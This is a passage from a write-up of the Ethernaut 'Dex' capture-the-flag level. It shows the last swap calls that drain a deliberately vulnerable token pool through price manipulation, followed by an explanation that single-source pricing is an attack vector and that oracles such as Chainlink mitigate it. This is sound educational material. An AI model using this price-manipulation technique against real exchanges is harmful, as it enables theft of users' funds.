timou0911/Ethernaut-Writeup/22. Dex ★★☆☆☆/README.md

 await contract.swap(token1, token2, 41); // swap 5
 await contract.swap(token2, token1, 45); // swap 6.
 Note that we can't swap with all our token2 balance since there are only 45 token2 in the pool at this time.
 ```

+## Getting Price From A Single Source

+It would be an attack vector if the contract retrieved data such as the price from a single source since hackers can manipulate that source and take advantage of it.

+One way to mitigate this problem is using oracles such as Chainlink.
+It retrieves data from multiple sources and gathers them, then sends the result onto the chain.